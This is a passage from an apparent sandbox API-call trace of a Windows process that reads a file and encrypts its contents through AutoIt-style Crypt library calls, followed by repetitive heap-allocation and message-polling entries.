(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.754] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0167.755] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x411c, lpOverlapped=0x0) returned 1 [0167.758] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0167.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x411c) returned 0x900318 [0167.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0167.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0167.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.759] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0167.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0167.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0167.760] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0167.760] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0167.760] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0167.761] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0167.761] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0167.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.761] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0167.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0167.762] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.762] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0167.762] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0167.762] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0167.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0167.762] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.763] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0167.763] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.763] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.763] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.763] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0167.763] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.763] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.763] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.763] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.764] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x411c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x4120) returned 1 [0167.764] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.764] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.764] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.764] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.764] CharLowerBuffW (in: lpsz="byte[16673]", cchLength=0xb | out: lpsz="byte[16673]") returned 0xb [0167.764] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.766] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.766] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.766] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.766] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9ed3e0*, pdwDataLen=0x87e820*=0x411c, dwBufLen=0x4120 | out: pbData=0x9ed3e0*, pdwDataLen=0x87e820*=0x4120) returned 1 [0167.766] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.766] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.766] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.767] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.768] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.768] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.768] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.768] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.768] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.768] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.768] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.768] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.768] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.768] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0167.768] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.768] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.768] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.770] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.771] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.774] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.774] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.774] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0167.774] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.774] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.774] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0167.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.774] CryptDestroyKey (hKey=0x90aed8) returned 1 [0167.774] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.774] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.774] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.774] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.774] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.774] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0167.774] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0167.774] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.774] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.774] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0167.775] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.775] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.775] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.775] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.775] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.775] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.775] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.775] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.775] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0167.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.775] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.775] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0167.775] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.775] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.775] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0167.775] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0167.775] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0167.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.776] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0167.776] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.776] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.776] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0167.776] FreeLibrary (hLibModule=0x74f20000) returned 1 [0167.776] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 